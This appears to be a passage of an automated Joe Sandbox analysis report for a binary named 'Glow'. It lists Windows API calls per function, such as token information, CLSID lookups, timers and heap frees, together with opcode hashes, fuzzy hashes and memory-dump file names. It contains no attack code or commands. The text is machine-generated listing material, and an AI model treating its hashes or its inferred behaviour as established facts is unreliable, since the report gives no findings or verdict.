                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$_free
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3170660625-0
                                                                                                                                                                          • Opcode ID: 3387b5c44bd513b00e868a6bacfe3523a4bdb4ec85485ead1dc50f32e631d922
                                                                                                                                                                          • Instruction ID: 001b889032fb7d7a67fa079bd8c42752e5b8488cc0e14c7f74767b5f7c82d721
                                                                                                                                                                          • Opcode Fuzzy Hash: 3387b5c44bd513b00e868a6bacfe3523a4bdb4ec85485ead1dc50f32e631d922
                                                                                                                                                                          • Instruction Fuzzy Hash: 1D01F4B6B416306B9613373C9C86EFB266DABC637E3210539FF3596992EE318B054124
                                                                                                                                                                          APIs
                                                                                                                                                                          • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,003E0831,80070057,?,?,?,003E0C4E), ref: 003E091B
                                                                                                                                                                          • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,003E0831,80070057,?,?), ref: 003E0936
                                                                                                                                                                          • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,003E0831,80070057,?,?), ref: 003E0944
                                                                                                                                                                          • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,003E0831,80070057,?), ref: 003E0954
                                                                                                                                                                          • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,003E0831,80070057,?,?), ref: 003E0960
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3897988419-0
                                                                                                                                                                          • Opcode ID: bcbc680a2d25aa2d54aa4d8fdac412e53f230f2066ecacedae34e08ff449b364
                                                                                                                                                                          • Instruction ID: 8af27249a06ca0e2bd63456311e96e18d5692ee73017017044f33b429e4ecf64
                                                                                                                                                                          • Opcode Fuzzy Hash: bcbc680a2d25aa2d54aa4d8fdac412e53f230f2066ecacedae34e08ff449b364
                                                                                                                                                                          • Instruction Fuzzy Hash: 3601F2B2A00228BFEB025F56DC04B9E7BBDEF44751F104224F905E2262D7B4CD80CBA0
                                                                                                                                                                          APIs
                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 003EF2AE
                                                                                                                                                                          • QueryPerformanceFrequency.KERNEL32(?), ref: 003EF2BC
                                                                                                                                                                          • Sleep.KERNEL32(00000000), ref: 003EF2C4
                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 003EF2CE
                                                                                                                                                                          • Sleep.KERNEL32 ref: 003EF30A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2833360925-0
                                                                                                                                                                          • Opcode ID: f659af24b1d7e591e45e14a6e58afcf2f8e82953111f38a4a62c8ce39504e7c4
                                                                                                                                                                          • Instruction ID: 9083d98e881a51436d0686b52e86b86a92dba49b88595c0448241431a56441bf
                                                                                                                                                                          • Opcode Fuzzy Hash: f659af24b1d7e591e45e14a6e58afcf2f8e82953111f38a4a62c8ce39504e7c4
                                                                                                                                                                          • Instruction Fuzzy Hash: 7301AD74C00529EFCF00AFB5E848AEEBB78FF08300F010566D541B2280DB709554C7A5
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 003E1A60
                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,00000000,?,?,003E14E7,?,?,?), ref: 003E1A6C
                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,003E14E7,?,?,?), ref: 003E1A7B
                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,003E14E7,?,?,?), ref: 003E1A82
                                                                                                                                                                          • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 003E1A99
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 842720411-0
                                                                                                                                                                          • Opcode ID: 331ca220b23479d7c6615042dfbe9e4fa4539962029e6d4b388cd533f29c31af
                                                                                                                                                                          • Instruction ID: 20ba3f8e8c90f36c458f8d1dd0558d2a20398e46da4b5ce75d017b44f9c0fef7
                                                                                                                                                                          • Opcode Fuzzy Hash: 331ca220b23479d7c6615042dfbe9e4fa4539962029e6d4b388cd533f29c31af
                                                                                                                                                                          • Instruction Fuzzy Hash: B30181B9A01215BFDB124F65DC48DAA3B6DEF84364B214424F845C3260DA31DC408A60
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 003E1916
                                                                                                                                                                          • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 003E1922
                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 003E1931
                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 003E1938
                                                                                                                                                                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 003E194E
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 44706859-0
                                                                                                                                                                          • Opcode ID: 84e666f076773d79ba272200034cf4099eee873c507999c9d2c94f656be2d0f9
                                                                                                                                                                          • Instruction ID: 8bafe239eb0764501a697105eec76c0b46b63e3fb5b627ece502ae9a42284df3
                                                                                                                                                                          • Opcode Fuzzy Hash: 84e666f076773d79ba272200034cf4099eee873c507999c9d2c94f656be2d0f9
                                                                                                                                                                          • Instruction Fuzzy Hash: 1CF062B5500315BBDB210F65DC4DF963B6DEF897A0F114424FA45D7291CB70DC408A74
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 003E1976
                                                                                                                                                                          • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 003E1982
                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 003E1991
                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 003E1998
                                                                                                                                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 003E19AE
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 44706859-0
                                                                                                                                                                          • Opcode ID: aa05416aebec1f63c1cfec6a17f95c1d59a4f2c27ba06b82c76fe36002f6c5ef
                                                                                                                                                                          • Instruction ID: 5f4d7c835c4d214a8eae1c95283bf41b15a772aa0ae50e08c31d9a38db286ea9
                                                                                                                                                                          • Opcode Fuzzy Hash: aa05416aebec1f63c1cfec6a17f95c1d59a4f2c27ba06b82c76fe36002f6c5ef
                                                                                                                                                                          • Instruction Fuzzy Hash: 07F0C2B5500311BBD7220F65EC58F973B6DEF893A0F114520FD05D7291CB30D8008A64
                                                                                                                                                                          APIs
                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,003F0B24,?,003F3D41,?,00000001,003C3AF4,?), ref: 003F0CCB
                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,003F0B24,?,003F3D41,?,00000001,003C3AF4,?), ref: 003F0CD8
                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,003F0B24,?,003F3D41,?,00000001,003C3AF4,?), ref: 003F0CE5
                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,003F0B24,?,003F3D41,?,00000001,003C3AF4,?), ref: 003F0CF2
                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,003F0B24,?,003F3D41,?,00000001,003C3AF4,?), ref: 003F0CFF
                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,003F0B24,?,003F3D41,?,00000001,003C3AF4,?), ref: 003F0D0C
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                                          • Opcode ID: aae3c108b4c90880dbdee9997eb2e19b2aa8372979b6d578476d018ebf8cd442
                                                                                                                                                                          • Instruction ID: b3b4cc902ceb8f95fb0400e3e4153186c6c0d7006cf3d76d30526345f58f29bd
                                                                                                                                                                          • Opcode Fuzzy Hash: aae3c108b4c90880dbdee9997eb2e19b2aa8372979b6d578476d018ebf8cd442
                                                                                                                                                                          • Instruction Fuzzy Hash: 5B01A271801B19DFCB35AF6ADD80826F7F9BF503153168A3ED2A652932C7B0A944DF80
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 003E65BF
                                                                                                                                                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 003E65D6
                                                                                                                                                                          • MessageBeep.USER32(00000000), ref: 003E65EE
                                                                                                                                                                          • KillTimer.USER32(?,0000040A), ref: 003E660A
                                                                                                                                                                          • EndDialog.USER32(?,00000001), ref: 003E6624
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3741023627-0
                                                                                                                                                                          • Opcode ID: d2b59951060e7471de98cbae3b925ac4e3ec786fb59e01f5d2c26b424292f41b
                                                                                                                                                                          • Instruction ID: 4b9bbf3912f7882c69c48c45c86a81dbc5517b200d832ed8edf2ce6e6745e6cb
                                                                                                                                                                          • Opcode Fuzzy Hash: d2b59951060e7471de98cbae3b925ac4e3ec786fb59e01f5d2c26b424292f41b
                                                                                                                                                                          • Instruction Fuzzy Hash: B3018170900314ABEB226F21DD4FBD67BBCFB14B45F004669A187A14E1DBF4AA448B94
                                                                                                                                                                          APIs
                                                                                                                                                                          • _free.LIBCMT ref: 003BDAD2
                                                                                                                                                                            • Part of subcall function 003B2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,003BDB51,00451DC4,00000000,00451DC4,00000000,?,003BDB78,00451DC4,00000007,00451DC4,?,003BDF75,00451DC4), ref: 003B2D4E
                                                                                                                                                                            • Part of subcall function 003B2D38: GetLastError.KERNEL32(00451DC4,?,003BDB51,00451DC4,00000000,00451DC4,00000000,?,003BDB78,00451DC4,00000007,00451DC4,?,003BDF75,00451DC4,00451DC4), ref: 003B2D60
                                                                                                                                                                          • _free.LIBCMT ref: 003BDAE4
                                                                                                                                                                          • _free.LIBCMT ref: 003BDAF6
                                                                                                                                                                          • _free.LIBCMT ref: 003BDB08
                                                                                                                                                                          • _free.LIBCMT ref: 003BDB1A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                          • Opcode ID: fffd3314a08d9c5a24f809e4e7115241ba3458a4b9a69731d526ae8319a776dc
                                                                                                                                                                          • Instruction ID: 1f6b7b9e15a50f2e77d99f99dfc59ee49a8cb5bb343fdac3f5785cdda07f1106
                                                                                                                                                                          • Opcode Fuzzy Hash: fffd3314a08d9c5a24f809e4e7115241ba3458a4b9a69731d526ae8319a776dc
                                                                                                                                                                          • Instruction Fuzzy Hash: BCF01272A44204ABC626EB58F981C9B77DDEE057147A60C1DF219DBD01DB30FC808658
                                                                                                                                                                          APIs
                                                                                                                                                                          • _free.LIBCMT ref: 003B262E
                                                                                                                                                                            • Part of subcall function 003B2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,003BDB51,00451DC4,00000000,00451DC4,00000000,?,003BDB78,00451DC4,00000007,00451DC4,?,003BDF75,00451DC4), ref: 003B2D4E
                                                                                                                                                                            • Part of subcall function 003B2D38: GetLastError.KERNEL32(00451DC4,?,003BDB51,00451DC4,00000000,00451DC4,00000000,?,003BDB78,00451DC4,00000007,00451DC4,?,003BDF75,00451DC4,00451DC4), ref: 003B2D60
                                                                                                                                                                          • _free.LIBCMT ref: 003B2640
                                                                                                                                                                          • _free.LIBCMT ref: 003B2653
                                                                                                                                                                          • _free.LIBCMT ref: 003B2664
                                                                                                                                                                          • _free.LIBCMT ref: 003B2675
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                          • Opcode ID: f6a850f56a44a80fd338b215ac4a75ca76eb8a1d1ea488e8058a9ab1fe4ac077
                                                                                                                                                                          • Instruction ID: 966bc6d501c4001e065a63a21805c863f9ebc1c07d244b0ee1b3226c49807614
                                                                                                                                                                          • Opcode Fuzzy Hash: f6a850f56a44a80fd338b215ac4a75ca76eb8a1d1ea488e8058a9ab1fe4ac077
                                                                                                                                                                          • Instruction Fuzzy Hash: BBF03075A013108B8643BF54EC41D9A3764BB257563010B6BF524D6676C7708A01AF8D
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: __freea$_free
                                                                                                                                                                          • String ID: a/p$am/pm
                                                                                                                                                                          • API String ID: 3432400110-3206640213
                                                                                                                                                                          • Opcode ID: 46d3869b8d51ad94dd8ac6b598841cb7614ae1747a7b050b8c49f55efe0c16d3
                                                                                                                                                                          • Instruction ID: 54c731ca2dd4b25a8fddfe1c34880df329d5e187c3bfcea1834899b89dca87ec
                                                                                                                                                                          • Opcode Fuzzy Hash: 46d3869b8d51ad94dd8ac6b598841cb7614ae1747a7b050b8c49f55efe0c16d3
                                                                                                                                                                          • Instruction Fuzzy Hash: 13D13475910206CBCB268F68C8757FAB7B5FF46308FAA015AEB029BE50D7749D40CB90
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 003F41FA: GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,004052EE,?,?,00000035,?), ref: 003F4229
                                                                                                                                                                            • Part of subcall function 003F41FA: FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,004052EE,?,?,00000035,?), ref: 003F4239
                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,?,?,00000035,?), ref: 00405419
                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 0040550E
                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 004055CD
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLastVariant$ClearFormatInitMessage
                                                                                                                                                                          • String ID: bn>
                                                                                                                                                                          • API String ID: 2854431205-2383257054
                                                                                                                                                                          • Opcode ID: c552dd8d066cbc07898e7744959add718bc1386713116ec33cf5aea719d25a14
                                                                                                                                                                          • Instruction ID: ea195f698c3c8cd7507f748addb3e04e51a88131c59abfc748a59988cb803ae6
                                                                                                                                                                          • Opcode Fuzzy Hash: c552dd8d066cbc07898e7744959add718bc1386713116ec33cf5aea719d25a14
                                                                                                                                                                          • Instruction Fuzzy Hash: 19D16074A00249DFCB05EF95C891AEEBBB4FF04304F54816EE416AF292DB75A986CF50
                                                                                                                                                                          APIs
                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 0038D253
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Init_thread_footer
                                                                                                                                                                          • String ID: t5E$t5E$t5E
                                                                                                                                                                          • API String ID: 1385522511-1177798998
                                                                                                                                                                          • Opcode ID: 91b2ffa83beb621a2068bcc40578e0929da16ab5df18ed8d5c048de80865af83
                                                                                                                                                                          • Instruction ID: bafcb5e3d9e51b522161a63a02a8715eb9cd1a166f3b11bef130343ea16fe338
                                                                                                                                                                          • Opcode Fuzzy Hash: 91b2ffa83beb621a2068bcc40578e0929da16ab5df18ed8d5c048de80865af83
                                                                                                                                                                          • Instruction Fuzzy Hash: 43915BB5A0030ADFCB55DF58C4806A9B7F1FF58300F2581AAD9459B381E731EA82CB90
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: BuffCharUpper_wcslen
                                                                                                                                                                          • String ID: CALLARGARRAY$bn>
                                                                                                                                                                          • API String ID: 157775604-3871307600
                                                                                                                                                                          • Opcode ID: 0e2f3b51c218bc7ee552701e5c66d2de9bcd69da44574b840124a802c94c51d6
                                                                                                                                                                          • Instruction ID: 0210b73144f7c3ae3b8daeb19d85287db6b6b44c79ba6e932fdeddac34173318
                                                                                                                                                                          • Opcode Fuzzy Hash: 0e2f3b51c218bc7ee552701e5c66d2de9bcd69da44574b840124a802c94c51d6
                                                                                                                                                                          • Instruction Fuzzy Hash: A341BF71E002159FCB00EFA5C8819EEBBB5FF58320B1141AEE406BB391E7789D81CB94
                                                                                                                                                                          APIs
